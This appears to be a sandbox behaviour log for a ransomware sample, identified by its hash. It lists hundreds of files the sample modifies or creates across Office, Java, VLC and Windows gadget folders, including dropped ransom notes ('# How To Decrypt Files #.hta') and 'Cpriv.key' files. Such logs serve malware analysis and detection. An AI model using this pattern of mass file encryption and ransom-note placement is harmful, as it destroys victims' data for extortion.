C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME13.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe AIR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195788.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CharSetTable.chr de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\OLMAIL.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB3A.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Groove.en-us\GrooveMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200289.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR6F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\macroprogress.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\Modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152716.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE06049_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Casual.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199303.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107258.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195260.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02066_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_mid.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18204_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mset7es.kic de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR50B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02115_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\XML Files\Space Templates\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RMNSQUE\RMNSQUE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01358_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR8F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\ISO690.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\Content.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107266.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10256_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ONENOTEIRM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\43.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14581_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107300.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Download\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSOUTL.OLB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301044.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01680_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0213449.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR4F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01866_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATERMAR\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Uninstall Information\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\INDST_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152698.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\AppInfoDocument\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR3F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\BLUEPRNT.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGLINACC.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\AdjacencyResume.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-dock.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Uninstall Information\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\10.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\travel.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\LEVEL\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PrivateAssemblies\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\CASCADE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\POSTL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21318_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ExecutiveMergeLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Premium.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00010_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15302_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\text_renderer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar 